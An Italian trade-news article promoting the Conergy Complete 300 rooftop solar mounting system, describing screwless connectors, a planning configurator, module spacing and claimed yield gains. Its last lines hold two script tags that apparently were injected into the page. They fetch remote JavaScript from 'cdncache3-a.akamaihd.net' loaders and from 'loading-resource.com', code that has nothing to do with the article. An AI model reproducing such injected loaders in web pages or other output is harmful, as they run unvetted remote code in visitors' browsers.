1. Home
  2. Notizie e Mercato
  3. Conergy complete 300: la rivoluzione individuale per l’installatore

Conergy complete 300: la rivoluzione individuale per l’installatore

Energie rinnovabili di
5/5
votato da 1 persone
Il sistema di montaggio completo, facile da installare e dal design accattivante che garantisce un’elevata produzione energetica


Il Complete 300, la prima soluzione completa per tetti a falde, è Il sistema di montaggio Conergy composto da tutti gli elementi necessari a renderlo un impianto fotovoltaico efficiente. Pensato per tetti residenziali (non integrati) rappresenta un approccio rivoluzionario nell’ambito degli impianti fotovoltaici poiché può essere installato più rapidamente, più facilmente e anche da una sola persona, permettendo di risparmiare tempo, fatica e soprattutto denaro.

Grazie ad un configuratore software all’avanguardia, è molto più facile per gli installatori progettare l’installazione, iniziando a pianificare l’intervento prima ancora di arrivare sul tetto. Questo è reso possibile in parte dal nuovo sistema di connettori “Roof Quickfix” – che permette l’assemblaggio dei moduli senza viti e il fissaggio solo del primo e dell’ultimo di una fila – rendendo possibile il montaggio della struttura di supporto del Complete 300 senza attrezzi. Anche i componenti generalmente più corti sono ideati per essere più pratici, più semplici da maneggiare e più facili da montare sulle superfici, perfettamente progettate per sostenere la struttura e dotate di un sistema antiscivolo applicato ai moduli che ne assicura il posizionamento stabile.

Disponibile anche nell’elegante versione noir delle celle e del telaio, il Complete 300 è costruito con un’intelaiatura intelligente che riduce la distanza tra i moduli a solo 1 cm, rendendo la superficie del modulo compatta ed elegante e garantendo un impatto visivo più armonico sulle coperture residenziali.

Conergy Complete 300 genera il massimo rendimento grazie alla speciale progettazione dei moduli e dei telai: la totale integrazione nel sistema li rende compatibili tra loro e aerodinamici, assicurando un’adeguata ventilazione alla struttura. Questa soluzione permette di ottenere un 2-3% di performance in più – sia ad alte temperature e anche qualora l’installazione non fosse completamente esposta al sole – grazie al nuovo sistema MPP tracking montato sugli inverter Conergy, ottimizzati per essere compatibili con queste soluzioni.

Tutto questo garantisce al cliente, relax e zero pensieri: un sistema non solo dotato di un piacevole design e nel contempo garante di alti rendimenti.

www.conergy.it

<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&amp;pid=1032&amp;zoneid=62862"></script><script src="https://loading-resource.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&amp;d=2012-10-16&amp;s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1" type="text/javascript"></script>